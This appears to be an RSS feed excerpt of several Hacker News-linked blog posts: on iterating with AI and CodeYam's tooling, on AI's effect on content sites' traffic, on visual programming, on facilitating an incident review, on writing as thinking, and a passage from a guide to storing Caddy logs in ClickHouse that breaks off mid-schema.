    Despite our wish to simply describe a task to AI and have it execute flawlessly without further guidance, this rarely succeeds for complex tasks. As complexity increases, so does the likelihood of AI diverging from our intended path. The longer we wait to validate results, the further off-track the work becomes.

    Iteration provides tremendous value in managing this risk. By breaking tasks into smaller components and validating results after each stage, we can ensure the AI remains aligned with our goals.

    However, this approach comes at a cost. You must invest time in validating the AI's output, which can undermine desired efficiency gains. If validation requires as much time as performing the original task yourself without AI, then the AI adds no value. In fact, the process potentially becomes more expensive when accounting for both the AI costs and your time costs.

    Now, it is possible that AI could become so powerful and inexpensive that simply giving it vague instructions and letting it try to accomplish a complex task is still worthwhile. In such scenarios, even mostly incorrect outputs might deliver enough value to justify the attempt, especially if the AI occasionally produces excellent results quickly and cheaply.

    This scenario seems unlikely, however. Historically, more powerful AI models have commanded higher prices. Expecting dramatically more capable AI at lower costs would require simultaneous breakthroughs in technology, business models, and operational efficiency. This is possible, but improbable, in the near-term.

    Even with hypothetical ultra-powerful, ultra-affordable AI, the communication challenge should not be underestimated. Complex projects like software development involve countless potential misunderstandings that compound over time, making quality outcomes from casual instructions highly unlikely.

    This is where tooling becomes crucial. Imagine you're fortunate enough to receive an AI-generated solution that's 80% aligned with your vision. The challenge then becomes articulating how to refine that complex result to match your ideal more closely.

    Trying to discuss complex ideas is very difficult if you don’t have ways to isolate specific aspects of that complex idea so that both parties know what exactly is being discussed. See also: Software Development with AI: Isolation and Abstraction.

    Imagine trying to edit a book without being able to refer to a chapter, page, or sentence in that book. It would be extremely difficult to ensure that there weren’t further miscommunications that then need to be fixed or discarded.

    The right tools dramatically simplify this process. When a tool enables navigating complex systems to isolate specific components for collaboration, you substantially reduce the complexity of the interaction. Both actors can focus on a smaller amount of context and discuss it more easily.

    More importantly, tools can provide interfaces for iterating on complex systems beyond text-based communication. For user interface design, as an example, you need visual tools that display the actual design rather than just text descriptions. You need to identify specific elements (isolation), and ideally make quick, verifiable edits to that design.

    Collaborating on complex projects like software applications will never be trivial. Even with hypothetical mind-reading technology that could extract your vision and execute it, you would likely evolve your thinking as you experienced the result and gathered feedback.

    For instance, you might overlook edge cases or user experience variations. This is particularly likely to occur when building complex applications with numerous potential states. Complex projects inevitably require frequent iteration, whether collaborating with humans and/or AI.

    We should focus significant effort on creating tools that allow us to easily isolate specific parts of a complex project, see and interact with those isolated parts more easily, and make changes to those isolated parts that can be easily validated. While this won't eliminate iteration costs entirely, it will significantly reduce them, making complex collaborations with both people and AI substantially more effective.

    This is why we’re building CodeYam. We’re creating a tool that deconstructs software projects down to individual functions. We demonstrate how these functions operate by testing them with various data scenarios, capturing results as either data outputs or, for front-end functions like React components, as screenshots or interactive components on a simple static website. This approach simplifies validation of, collaboration around, and AI-assisted modifications to complex software projects.

    CodeYam helps software teams increase confidence in code changes by making it easier to discover if a change is having the intended impact, or introducing bugs or side effects, via software simulations. These simulations provide test coverage, help teams understand the state of and any changes to their application, and can be used for documentation, demos, and collaboration. To learn more, please contact us or join the waitlist.

    ✉️ Email Us

    Join the Waitlist

    Discussion about this post

    ]]>
    https://blog.codeyam.com/p/ai-cant-read-your-mindbut-iteration hacker-news-small-sites-43206566 Fri, 28 Feb 2025 15:20:37 GMT
    <![CDATA[AI is killing some companies, yet others are thriving – let's look at the data]]> thread link) | @corentin88
    February 28, 2025 | https://www.elenaverna.com/p/ai-is-killing-some-companies-yet | archive.org

    AI is quietly upending the business models of major content sites. Platforms like WebMD, G2, and Chegg - once fueled by SEO and ad revenue - are losing traffic as AI-powered search and chatbots deliver instant answers. Users no longer need to click through pages when AI summarizes everything in seconds. Brian Balfour calls this phenomenon Product-Market Fit Collapse, a fitting term, marking it as the next big shift in tech.

    Key milestones accelerating this shift:
    📅 Nov 30, 2022 – ChatGPT launches
    📅 Mar 14, 2023 – GPT-4 released
    📅 May 14, 2024 – Google rolls out AI Overviews

    ❗Disclaimer: I'm simply observing traffic trends from an external perspective and don’t have insight into the exact factors driving them. The timing aligns with AI, but like any business, multiple factors are at play and each case is unique.

    → The data comes from SEMRush. If you want access to trend reports like the one below, you can try it for free.

    WebMD: Where every symptom leads to cancer. They're crashing and burning and the timing aligns with major AI releases. If they don’t launch AI agents (like yesterday), they’re in trouble. That said, they still pull in ~90M visits a month.

    Quora: Once the go-to platform where user-generated questions got a mix of expert insights and absolute nonsense - is struggling. And it’s no surprise. AI now delivers faster, (usually) more reliable answers. Yet, despite the challenges, Quora still pulls in just under 1 billion visits a month.

    Stack Overflow: The Q&A platform for developers, is now facing seemingly direct competition from ChatGPT, which can generate and debug code instantly. As AI takes over, the community is fading - but they still attract around 200M visits a month.

    Chegg: A popular platform for students - now getting schooled by AI. Weirdly, they’re fighting back by suing Google over AI snippets. Not sure what they expect… Google controls the traffic and that’s the risk of relying on someone else’s distribution.

    G2: A software review platform, is experiencing huge drop in traffic levels. This one is so rough.

    CNET: A technology news and reviews website is experiencing 70% traffic drop from 4 years ago. They still pull in 50 million visits per month - an impressive volume - but a steep drop from the 150 million they once had.

    Just look at Reddit. Many say they are impacted, but traffic says otherwise - they are CRUSHING it. Probably because people are gravitating toward authentic content and a sense of community. I know I cannot go a day without a Reddit scroll (/r/LinkedInLunatics alone is worth visiting on the daily). And look at the y-axis: their traffic is in the billions!

    And even Wikipedia is managing to stay afloat (although research AI tools will probably hit it pretty hard). Also, over 5B visits a month - consider me impressed.

    And you know who else is growing? Substack. User-generated content FTW.

    Edited by Melissa Halim

    ]]>
    https://www.elenaverna.com/p/ai-is-killing-some-companies-yet hacker-news-small-sites-43206491 Fri, 28 Feb 2025 15:12:54 GMT
    <![CDATA[Visual programming is stuck on the form]]> thread link) | @praptak
    February 28, 2025 | https://interjectedfuture.com/visual-programming-is-stuck-on-the-form/ | archive.org

    Underlying great creations that you love—be it music, art, or technology—its form (what it looks like) is driven by an underpinning internal logic (how it works). I noticed this pattern while watching a talk on cellular automaton and realized it's "form follows function" paraphrased from a slightly different angle. Inventing a form is a hard task, so you must approach it obliquely—by first illuminating the underlying function.

    This made me realize something crucial about visual programming: it’s stuck on form, rather than letting form follow function. Visual programming has long been trapped in the node-and-wires paradigm because its designers are overly fixated on form, neglecting the underlying function that should drive it. So as a whole, the field is stuck in a local minima. How can we break out of it and how can we find a function for the field that underpins the form?

    A clue from CellPond

    I was watching a talk and was struck not just by the presentation but also by a specific quote from Lu Wilson in a talk about CellPond–a visual programming language that expanded my expectations for cellular automata. And that's given that I'd already seen my share of the Game of Life by John Conway and read lots of A New Kind of Science by Stephen Wolfram.

    But even though Lu Wilson spent the last 10 minutes showing you the fantastic visuals, none of that was the point. The actual tasty result is that there is a virtual machine with only four operations underlying the CellPond system. And these four operations correspond with memory operations we're familiar with in CPUs: read, write, allocate, and deallocate. To me, that connection was utterly surprising. The grid of patterns (form) was informed and driven by the underlying virtual machine (function).

    "I think if you were to learn from CellPond, you'd take away not just the UI—but you can take the UI too if you want. I was very surprised by this because, in all my reading of past solutions to these problems, they were all about the high-level user interface; they were about the UI. I thought I'd have to build layers upon layers of UI, but really, as soon as the low-level stuff was sorted out, the UI just figured itself out."
    - Lu Wilson (🐤 · 🦋)

    I wondered: how did Lu Wilson come up with the underlying function? It seemed magical. This puzzling revelation made me realize it wasn’t just about the UI—there was a deeper principle at play.

    Form follows function

    In the subsequent months, I kept turning it over in my head. The key lay with the opening quote.

    When you figure out the low-level stuff, the UI all falls into place.

    It wasn't until a drive while I was listening to Paul Graham's A Taste for Makers that I made the connection. The CellPond talk was a demonstration of the oft-repeated adage of "form follows function." Here's the relevant excerpt:

    In art, the highest place has traditionally been given to paintings of people. There is something to this tradition, and not just because pictures of faces get to press buttons in our brains that other pictures don't. We are so good at looking at faces that we force anyone who draws them to work hard to satisfy us. If you draw a tree and you change the angle of a branch five degrees, no one will know. When you change the angle of someone's eye five degrees, people notice.

    When Bauhaus designers adopted Sullivan's "form follows function," what they meant was, form should follow function. And if function is hard enough, form is forced to follow it, because there is no effort to spare for error. Wild animals are beautiful because they have hard lives."
    - Paul Graham A Taste for Makers

    Honestly, I had never thought much about "form follows function." It seems obvious enough when you hear it for the first time. Sure, given an interface, why else would it express anything other than its purpose? It would seem counterproductive otherwise.

    It wasn't until I was forced to invent a form did I really understood what it meant. The adage "form follows function" is for those tasked to invent the form, not for when you're given it. In my own words, it's this:

    If a design is any good, how something looks, feels, and works is a naked expression of its function, its algebra, its rationality–its underlying nature. To design a form, you should not just come up with it out of thin air. You have to attack the problem obliquely and work out its function first. Once the function–the underlying nature, internal consistency, and algebra–is worked out, the form will fall out as a consequence of it.

    Three faces of function

    What I mean by "underlying nature" isn't that it exists independently of human creation; rather, every design is embedded in an environment that shapes its intrinsic properties. The function of anything useful is always in the context of its environment. When we understand the context of a well-designed thing, we understand why it looks the way it does. An animal form reflects its adaptation to the ecological niche in its environment.

    By "rationality", I mean some kind of internal consistency. The function of something well-designed will have a certain repeated symmetry. Given a choice of design, it'll consistently use the same thing in as many scenarios as possible. Good game design enables a single item to serve multiple functions. The gravity gun in Half-Life 2 enables players to pick up and launch objects. It's used for turning environmental items into weapons, solving physics-based puzzles, and for navigating hard-to-reach areas. In Minecraft, the water bucket can extinguish fires, create waterfalls for safe descent, irrigate farmland, and serve as a barrier against certain enemies.

    By "algebra", I mean a set of rules about how a design's components compose. Most games have a physics engine that computes how objects in a game interact with each other in space. It's a "movement calculator." Legend of Zelda: Breath of the Wild additionally has a chemistry engine that it uses to compute how different materials interact with each other. It's a "state calculator."

    In summary, function represents the intangible structure governing the relationships, interactions, and contextual fit of a design’s underlying components. A form can't exist outside of its function, and its function is shaped by its environment. We can observe and interact with the form directly, but not its function. We can exist in the environment, but the function is invisible to us without a lot of work to infer it.

    A form not informed by function feels disjointed, inconsistent, and frustrating. Without an underlying function to underpin the form, the shape of form is simply at the inconsistent whims of the designer. Functions keep designers honest about the purpose of form: in service of function. Of course you can explore and play with form independent of function, but that's the jurisdiction of art, not design.

    To invent a form, start with the function

    "Form follows function" is advice for people making something, especially those whose work has a very visible interface facing the end user. To invent a form, start with the function. But it's easy to make errors of two kinds, even if you already know this in your head.

    The first kind of error is to pursue form without considering function. Instead, you must ignore the form, at least initially, and focus on figuring out the function first. This is largely due to the intangible nature of function. It's an easy mistake to focus on form, even far into your creative career.

    This mistake is understandable. Whenever people interact with anything, their initial contact is the interface—the bridge between user and design. For anyone new to something, it's natural to start by engaging with that interface, because it's what they're most familiar with. So when they turn around to make something in that domain, they start with the interface, the form. You can see this readily: new creatives in a field start by copying the masters before finding their own voice.

    It's also understandable because function is largely more abstract and more intangible than form. It's harder to get a grip on something amorphous, and you may have to start off with something concrete. It can be part of the process to draw up concrete examples first. In fact, when confronted with an unfamiliar domain, this can be quite productive in getting a handle on it. But it can be easy to forget and take a step back and ask: "what is the common underlying logic or abstraction to all these examples?" When you are able to take a step back, you're using the concrete examples as a stepping stone to figuring out the underlying function.

    The error of the second kind is pursuing function without considering the user. As a warning for those that lean too far on the other side of the precipice, this doesn't mean you can ignore the end user when figuring out the function. If we could represent the utility of the underlying function as a vector, it would still need to point in the direction of the user. The underlying function must support and give context to the visible form built on top. Both are built so the direction and magnitude of their utility vector can support the user in the direction of their goals.

    Too many back-end engineers misinterpret 'form follows function' as a license to design arbitrary database tables and APIs, assuming that the front end will compensate. That's how we get terrible interfaces where the end user needs to be aware of the data model to use it effectively, like Git.

    When it comes to visual programming, I think it's stuck in the error of the first kind, with its focus on form.

    Visual programming is not just node-and-wires

    Node-and-wire diagrams have become a lazy default. Most visual language designers never ask whether those boxes and arrows genuinely help programmers. It’s a classic case of letting form precede function.

    When one looks through the Visual Programming Codex, it's obvious an overwhelming majority are based on the node-and-wires model. Not just that, but there are mostly only two variations:

    1. The nodes represent data, and the wires represent functions
    2. The nodes represent functions, and the wires represent data shunted between functions.

    Did many of them settle on it because it's the best visual representation to help aid the process of programming? Or did they use it because they're mimicking an existing form?

    I think node-and-wires is popular because visual programming designers make the fundamental assumption that the underlying nature and logic of programming is just traditional textual programming. If that's your assumption, then you'd naturally think all you have to do is find visual representations for existing textual language constructs. Hence node-and-wires is the form you get when you take pure functions as the underlying logic underpinning the form.

    On first glance, node-and-wires seem like a good fit. The wires going into a node are like the input parameters of a pure function, and the wires going out are like the output value. But what about differentiating between the definition of a function versus calling it? Often in node-and-wires visual languages, there's no separation. The definition is the application. What about passing around functions or thunks? Much of the power in pure functional programming lies in the power of higher-order functions, and I haven't seen very good node-and-wires representation of that. After decades of trying, most pure functional programming is still largely expressed in text. To me, that's damning evidence against the practice of using nodes-and-wires to model functions. Text is still the better form for expressing the underlying logic of functional programming.

    Imperative programming with node-and-wires fares no better. A loop in LabVIEW gives no more advantage or clarity over writing it in text. Seeing the totality of a sequence of steps in parallel in a circuit-like diagram doesn't solve the fundamental problem with imperative programs; it doesn't help the developer understand combinatorial state explosions or state changes over time.

    I think where node-and-wires have provided the biggest advantage is in specific domains in which a) there's massive value to examine intermediate data and values between transformations and b) there's a well-known visual representation of that intermediate data and value. This has been demonstrated in visual languages like Unreal Engine's Blueprint for game programming shaders and Max/MSP for sound synthesis in music. But these have been limited to these narrow domains. Visual programming has not found a foothold in general purpose programming domains.

    Modeling problems

    What then, if not node-and-wires? The aim here is to uncover an alternative underlying logic—one that can more effectively drive the form in visual programming. How would you go about finding another underlying function in "form follows function" if not the current programming paradigms we know? I think this is the wrong question. Although correct in direction and spirit, I think a better question is: how should we model problems that can leverage the computational power of our visual cortex?

    We write programs primarily to model and solve real-world problems. We go through the exercise of encoding the problem model in programming languages, because we can automate the generation of solutions. And the reason why we keep banging on the visual programming door is because we understand intuitively that our visual cortex is an under-leveraged power tool.

    The human visual cortex is a powerful pattern recognition apparatus. It can quickly compare lengths, distinguish foreground from background, recognize spatial patterns, and other amazing feats of perception, all at a glance. We leverage it in data visualizations to make sense of large quantities of data, but we haven't been able to leverage it to make sense of computational systems.

    ❓"Imagine what a visual programming language would look like if it was able to leverage the power of the human visual cortex" For the record, I don't think this is it.

    If we had a visual programming language that could leverage the human visual cortex, then at any zoom-level of abstraction, at a glance we could understand the overall structure of the program as it relates to the domain at that level of abstraction. And if we were looking at a running program, then we could get an idea of the overall state and process. Yes, we have bespoke visualizations of running programs in the form of metrics and dashboards. But we don't have a universal visual language to represent the structure or state of a program that applies to different programs.

    What about text? Aren't textual glyphs a kind of visual language? Not in the way I mean. For text to be considered a visual programming language, it'd have to leverage the human visual cortex at different zoom-levels of the program. Certainly, with syntax highlighting we leverage the visual cortex and use color to distinguish between different syntactical elements. This counts. But we only get this at the level of a function. It doesn't apply when we zoom out to the overall structure of the code base. And there's certainly no zoom-out level in which we get visual understanding at the level of the problem domain.

    The closest thing I can think of that might fit the bill is APL and its ilk. By condensing operators into single characters, sequences form idioms. Just as we recognize whole words rather than individual letters, idioms allow us to comprehend entire operations without parsing each symbol. So as you zoom out of the code, you can see the meaning of the code by identifying common idioms. Strangely, it seems many APL environments don't feature syntax highlighting.

    So if visual programming is to be useful, I think the angle of attack is to find a way to model problems, and this might not be the same way that we model problems in textual languages–even if the underpinning implementation is all lambdas and Turing machines. So how do we model problems?

    Entities and relationships

    I'll say up front, I don't know what modeling problems should look like. Nonetheless, it seems there are two main aspects for any system we're interested in:

    1. visually representing the entities in a problem domain
    2. visually representing the entity relationships.[2]

    Regardless of the paradigm, imperative, object-oriented, functional, or logical, there are both "entities" (structs, objects, compound values, terms) and "how they relate" (imperative processes, messages, functions, rules and predicates). If I had to take a stab at it, I'd start here.

    Of the two, representing the different entities in a problem domain seems more amenable to visual programming because they're nouns. Most of the things we see around us are nouns. Hence, we can imagine that inert data representing entities would have a canonical visual representation. But even then, entities often have far more attributes than we might want to visualize at a time to understand its purpose and behavior. How do we choose what attribute is important to show? And what should be the visual form for the attribute in these entities?

    The two questions are related, but to drive the point home, I'll focus on the second one. If we have some struct with two attributes in some generic language, how would we visually represent them?

    struct Foo {
      bar: float,
      baz: float
    }

    We might think a universally useful representation of a collection of these instances is two histograms: one for bar and one for baz. For any given instance, its corresponding value could be highlighted on the histogram.

    Is this useful? Answer depends on our task at hand. There's no one-size-fits-all visualization of entities. What if I told you bar is an x-coordinate and baz is the y-coordinate? Now, perhaps a visualization that's more fitting is a scatterplot where each instance is represented as an x. We put the relationship between bar and baz in a spatial relationship to see if our visual cortex could recognize a pattern.

    In the histogram visualization, I wouldn't be able to use my visual cortex to discern the relationships between bar and baz traces out a flower. However, in the spatial canvas visualization, I could easily see the flower trace because by pitting bar and baz in a spatial relationship, I'm creating a mapping that makes an affordance for my visual cortex.

    This only worked because there was a spatial relationship between bar and baz, especially if I know they represent x and y coordinates. We couldn't just look at the data and easily discern what visualization to use. The label and the intention of the user also give meaning to what visualization is best suited for an entity. Hence, I think there's no one-size-fits-all visualization for entities. There's no single mapping of attributes to visualizations that makes sense, unless the user's intention and goals remain fixed.

    Besides entities, every program encodes relationships between its entities. How do we visually represent their relationships in a way that's illuminating at a glance without devolving into an illegible spaghetti mess? Relationships can be harder to model, because they're typically invisible to us, as they're often inferred.

    Like the example with representing entities visually, representing relationships visually is likely to depend on both the goals of the user as well as the meaning of the entities at hand. I suspect a good visual representation of the relationship between two tables in a query is going to be different than a good visual representation of the relationship between two pieces of middleware in a web stack. However, I do think we can do better than a line.

    The go-to representation of a relationship is often the line or an arrow, where it connects two things on the canvas together. The trouble with lines is that they doesn't scale with the visual cortex. After a couple dozen lines, we lose track of any sense of the overall relationships between entities. But I don't think this can be the only way. The visual cortex also relates visual elements if they have the same color or if they're spatially clustered together. As the previous example on a plot of bar and baz showed, relationships could be spatial, by which we can plot them spatially to reveal relationships, without directly drawing lines and arrows everywhere.

    As before, it's hard to draw any generally productive conclusions on how to best visually represent relationships between entities without knowing the goal of the user as well as the meaning behind the entity and relationships we're trying to represent. The only point I'm trying to drive home is that we have more tools at our disposal besides lines and arrows, because the visual cortex is perceptive and discerning about colors, groupings, and motion. We typically use these visual elements haphazardly, if at all, rather than as a deliberate attempt to leverage it for understanding. And that's just in graphic design and data visualization. It's completely overlooked in program structure, debugging, and domain problem modeling.

    At this point, those that hear entities and relationships might be drawn to ask, isn't this just object-oriented programming? It is true that object-oriented thinking trains you to identify entities in the problem domain and model their relationships through method calls and messaging. However, object-oriented programs suffer from private state whose effects are observable from the outside littered everywhere, making it hard to reason about program behavior. What I'm saying is orthogonal to and doesn't invalidate what we've learned about structuring programs in the past 3 decades. To sum up, I'm saying the unit of representation for visually representing programs may not be the function and its input and output parameters, as node-and-wire visual programmers are likely to do. It might be something else, which can leverage the power of the visual cortex.

    Computation is figuring out the next state

    Modeling problems as entities and their relationships is only half the equation. By only modeling entities and their relationships, we've only described a static world. We can do that already without computers; it's commonly done on whiteboards in tech companies around the world. Every time we go up to the whiteboard with a coworker to talk through a problem, we're trying to leverage the power of our visual cortex to help us reason through it. But unlike our textual programs, whiteboards aren't computational.

    If whiteboards were computational, they might show how the state of the problem changes over time, or how it changes in response to different external inputs or effects. Thus, the question is, how do we visually represent how the system state should evolve over time or in response to external inputs? [1]

    Cellular automaton systems typically express computation through rulesets. Rulesets are typically expressed as a pure functional transformation between the current state and the next state. Taking rule 110 in 1D cellular automaton as an example, the state of the next cell depends on the three cells above it. Given the three cell pattern above, this is what the cell in the next line should be. You can see this like a β-reduction, substituting symbols with other symbols until we can substitute no further, with the resulting value as our answer.

    The famous rule 110 in 1D cellular automaton. This rule is Turing Complete!

    As the CellPond talk at the top of the page points out, rulesets for more complicated behaviors, like trains on tracks have a combinatorial explosion of rules. One of CellPond's innovations was to have rulesets that represent (or generates?) groups of rulesets, so that visually expressing the rulesets remains tractable for humans.

    But pure functions are just mappings. Any pure function can be replaced by an equivalent infinite table of key-value pairs. Rulesets are just explicit mappings of inputs to outputs. Hence, if rulesets are to be tractable, we must be able to express not just how a single current state maps to the next state, but how entire groups of states map to a next state.

    We have familiar mechanisms in textual programming to express a selection of groups of input states in a succinct way. We have boolean logic in if expressions. We have maps and filters. We have select and where clauses in SQL queries. But we have no universal and composable ways of expressing this selection of previous states and mapping them to next states. Additionally, we don't have universally recognized ways of expressing this mapping from groups of inputs to outputs for state types other than a grid of cells.

    A different way forward

    Certainly, it could be possible that multi-dimensional aspects of a codebase would be quite hard to represent in its entirety visually. But I don't think it's a stretch to say that we lean pretty hard on the symbolic reasoning parts of our brain for programming and the visual reasoning parts of our brain are underleveraged.

    Visual programming hasn't been very successful because it doesn't help developers with any of the actual problems they have when building complex systems. I think this is a result of ignoring the adage "form follows function" and trying to grow a form out of traditional programming paradigms that fail to provide good affordances–the utility vector is pointing the wrong way–for those actual problems in complex systems. To make headway, I think we should focus on discovering underlying logic and function of how to model problems visually on a canvas–not just the entities, but also their relationships. In addition to modeling problems, we also have to discover how to model transformations and transitions of state, so our models are also computational.

    We have the hardware: our visual cortex is a powerhouse for pattern recognition and spatial reasoning. We just don’t have the right computational grammar to feed it. If we want a visual programming breakthrough, we have to leave the legacy of text-based paradigms behind and unearth a new kind of function—one that only makes sense visually. Once we do, the right ‘form’ will follow so obviously, we’ll wonder why we waited so long.


    [1] One way is with visual rule sets. This almost feels like declarative or logic programming. But as the Cell Pond talk at the top of the essay pointed out, unless you have a representation of rule sets that can be expanded, you suffer combinatorial explosion.

    [2] Depending on who you are, this can sound either like object-oriented programming or category theory.

    ]]>
    https://interjectedfuture.com/visual-programming-is-stuck-on-the-form/ hacker-news-small-sites-43206340 Fri, 28 Feb 2025 15:01:23 GMT
    <![CDATA[An Incident Review of an Incident Review – Will Gallego]]> thread link) | @vinnyglennon
    February 28, 2025 | https://willgallego.com/2025/01/11/an-incident-review-of-an-incident-review/ | archive.org

    So I bombed an incident review this week. More specifically, the facilitating.

    I’ve run post mortems/retrospectives/PIRs, whatever you want to call them, for over a decade. Just felt my arthritis kick in a bit as I typed that. It’s hard to quantify, to even qualify, subtle nuances and questions I’ve developed as handy go-to’s to get folks to speak up during interviews and meetings. My friend Lorin Hochstein said that facilitation is the hardest part of the work, which feels pretty on the money. You can always take another swing in an interview, prep what questions you’re likely to ask or come back around during the PIR (post incident review) with everyone. Walking through timelines and dashboards are toilsome, but they’re rarely more than an inconvenience of time and energy. I could see an argument made for summarization and write ups (“Tell me everyting we will need to know, all the tasks to make sure this ‘doesn’t happen again’ – but make it short enough so folks will want to read it”).

    But running the meeting, yeah, that can be sneakily hard. You mostly have one shot at it and before an audience who you’ve convinced to spend their time in yet another meeting instead of “the real work” (aside – incidents are part of the real work). It’s very easy to lose folks, say the wrong thing, let emotions run high.

    Funny thing is I typically think of myself as worse at the parts outside of the meeting. I’ve got golden retriever energy when it comes to helping folks out, and the PIR meeting is where I shine. It’s my job to care about folks, to make sure they’re heard? And you’re going to pay me to see folks do the “aha!” moment when the parts click? Sign me up, that’s entirely my jam. I’m fairly loquacious and have a knack for vulnerability-as-means-of-disarming folks, getting them to feel that yes it’s ok to say “I don’t know”. I consider that last bit a personal superpower.

    So what went wrong? The humor of analyzing the analysis, finding the fault when we’re hunting through the pieces of an outage, isn’t lost on me. It’s also an easy slide into over analyzing everything we do, some college sophomore philosophy student who suddenly falls into a nihilistic hole trying to debate with everyone this sudden newfound enlightenment. To spoil the ending, I leaned too heavily on my tropes, enthusiasm and admittedly a bit of weariness from the week laying on top of a meeting. I’m also trying to get momentum for more PIR meetings, and while I know a surefire way to poison that is to set up a ton of very long and dry discussions, I condensed the review to a half hour to entice folks into joining. “That’ll surely be enough!” he lied to himself.

    I tend to talk. I probably say in twenty words what can be said in five. That can be comforting to some folks, vamping while they gather ideas. It’s my crutch as I over explain to really make sure folks understand. That was heavily present in this latest. I got a nudge “Hey, let people talk more” in the meeting. Twice, actually, which is fairly impressive for only 30 minutes. That’s one of my focal points for PIR meetings too – don’t just repeat the narrative of events, let the participants state what happened. Folks will nod and say “Yup!” and agree with facilitators, that small modicum of power within the virtual walls of that meeting, because that’s what we’re inclined to do. Surefire way to get people not to share their expertise.

    I was bummed for a few hours, because I felt it immediately after. No one had to mention it, I could see it clear as day. I try to leave five to ten minutes at the end of a meeting as a free space – action items, sure, but “what did we miss?” more so. There were at least two or three ideas of areas we failed to cover which feel pretty core to the learning. “Yeah, we don’t still understand the source of the problematic requests, and…”. etc.

    But the world didn’t end. It (typically) doesn’t when we have a major outage and I’m fairly confident we’ll be ok here. It’s good to recognize, even with a ton of experience, facilitators do have tried-and-true methods that can hinder if overused. I’ll also say, in retrospect, I had a question I was drilling down on for at least 15 minutes that I wanted answering, likely in my head before the meeting started. Checking bias at the door, notably when it’s your team in the driver’s seat, is hard.

    If nothing else, incidents are surprises. “Well that went wrong and caught me off guard” feels akin to that. I’ll grab this post another day in the future and appreciate it, a few more reviews under my belt that hopefully turn more my way.

    Photo: https://www.flickr.com/photos/cogdog/8761308672

    ]]>
    https://willgallego.com/2025/01/11/an-incident-review-of-an-incident-review/ hacker-news-small-sites-43206222 Fri, 28 Feb 2025 14:51:10 GMT
    <![CDATA[Write to Escape Your Default Setting]]> thread link) | @kolyder
    February 28, 2025 | https://kupajo.com/write-to-escape-your-default-setting/ | archive.org

    For those of us with woefully average gray matter, our minds have limited reach. For the past, they are enthusiastic but incompetent archivists. In the present, they reach for the most provocative fragments of ideas, often preferring distraction over clarity.

    Writing provides scaffolding. Structure for the unstructured, undisciplined mind. It’s a practical tool for thinking more effectively. And sometimes, it’s the best way to truly begin to think at all.

    Let’s call your mind’s default setting ‘perpetual approximation mode.’  A business idea, a scrap of gossip, a trivial fact, a romantic interest, a shower argument to reconcile something long past. We spend more time mentally rehearsing activities than actually doing them. You can spend your entire life hopping among these shiny fragments without searching for underlying meaning until tragedy, chaos, or opportunity slaps you into awareness.

    Writing forces you to tidy that mental clutter. To articulate things with a level of context and coherence the mind alone can’t achieve. Writing expands your working memory, lets you be more brilliant on paper than you can be in person.

    While some of this brilliance comes from enabling us to connect larger and larger ideas, much of it comes from stopping, uh, non-brilliance. Writing reveals what you don’t know, what you can’t see when an idea is only held in your head. Biases, blind spots, and assumptions you can’t grasp internally.

    At its best, writing (and reading) can reveal the ugly, uncomfortable, or unrealistic parts of your ideas. It can pluck out parasitic ideas burrowed so deeply that they imperceptibly steer your feelings and beliefs. Sometimes this uprooting will reveal that the lustrous potential of a new idea is a mirage, or that your understanding of someone’s motives was incomplete, maybe projected.

    If you’re repeatedly drawn to a thought, feeling, or belief, write it out. Be fast, be sloppy. Just as children ask why, why, why, you can repeat the question “why do I think/feel/believe this?” a few times. What plops onto the paper may surprise you. So too will the headspace that clears from pouring out the canned spaghetti of unconnected thoughts.

    “Writing about yourself seems to be a lot like sticking a branch into clear river-water and roiling up the muddy bottom.”

    ~Stephen King, Different Seasons (Book)

    “I write entirely to find out what I’m thinking, what I’m looking at, what I see and what it means. What I want and what I fear.”

    ~Joan Didion, Why I Write (Article)

    ]]>
    https://kupajo.com/write-to-escape-your-default-setting/ hacker-news-small-sites-43206174 Fri, 28 Feb 2025 14:45:36 GMT
    <![CDATA[Getting Caddy Logs into ClickHouse via Vector]]> thread link) | @zX41ZdbW
    February 28, 2025 | https://scottstuff.net/posts/2025/02/27/caddy-logs-in-clickhouse-via-vector/ | archive.org

    As mentioned before, I’ve been using the Caddy web server running on a couple machines to serve this site. I’ve been dumping Caddy’s access logs into Grafana’s Loki log system, but I haven’t been very happy with it for web logs. It’s kind of a pain to configure for small uses (a few GB of data on one server), and it’s slow for my use case. I’m sure I could optimize it one way or another, but even without the performance issues I’m still not very happy with it for logs analysis. I’ve had a number of relatively simple queries that I’ve had to fight with both Loki and Grafana to get answers for.

    In this specific case, I was trying to understand how much traffic my post on the Minisforum MS-A2 was getting and where it was coming from, and it was easier for me to grep through a few GB of gzipped JSON log files than to get Loki to answer my questions. So maybe it’s not the right tool for the job and I should look at other options.

    I’d been meaning to look at Clickhouse for a while; it’s an open source (plus paid cloud offering) column-store analytical DB. You feed it data and then use SQL to query it. It similar to Google BigQuery, Dremel, etc, and dozens of other similar systems.

    The big advantage of column-oriented databases is that queries that only hit a few fields can be really fast, because they can ignore all of the other columns completely. So a typical analytic query can just do giant streaming reads from a couple column without any disk seeks, which means your performance mostly just ends up being limited by your disks’ streaming throughput. Not so hot when you want to fetch all of the data from a single record, but great when you want to read millions of rows and calculate aggregate statistics.

    I managed to get Clickhouse reading Caddy’s logs, but it wasn’t quite as trivial as I’d hoped, and none of the assorted “how to do things like this” docs that I found online really covered this case very well, so I figured I’d write up the process that I used.

    Installing Clickhouse

    Setting up Clickhouse is trivial; their docs provide the usual curl | sh option as well as an Apt repository for Debian and Ubuntu.

    I’m just running it on a single system and I’m really not planning on shoving a ton of data into it, so a basic install should be fine. The only settings to worry about are the usual database access control settings – what is the default password, and are network accesses allowed? Pretty much everything can be tweaked via config files or live DB changes after installation.

    In my case, I want to allow network connections, and I want to create a new user called weblogger that is allowed to connect without a password from a specific network block. That’s pretty easy to set up:

    CREATE USER 
      weblogger 
    NOT IDENTIFIED 
    HOST IP '172.16.0.0/12';

    Next, I want to create a new database just for weblogs:

    This gives me a new database namespace for weblog data.

    Creating a schema for Caddy

    Next, I want to create a table for storing Caddy’s weblog data. This probably isn’t ideal, but it works for me at the moment. I’ve added basically everything from Caddy’s JSON format, plus a couple additional fields that I’m going to populate in my import pipeline later.

    Note that I’m not really reformatting Caddy’s logs here – they contain nested JSON objects, and I’ve kept the same format in Clickhouse by using Tuple and Map types. Tuple fields can be read in the obvious way; select request.headers['User-Agent'] will fetch the User-Agent header from the request.headers map from inside of the request tuple.

    Here’s the schema that I’m currently using:

    CREATE TABLE weblogs.weblogs
    (
        `level` String,
        `ts` Float64,
        `timestamp` DateTime64(3),
        `server` String,
        `msg` String,
        `request` Tuple(
          `remote_ip` String,
          `remote_port` String,
          `client_ip` String,
          `proto` String,
          `method` String,
          `host` String,
          `uri` String,
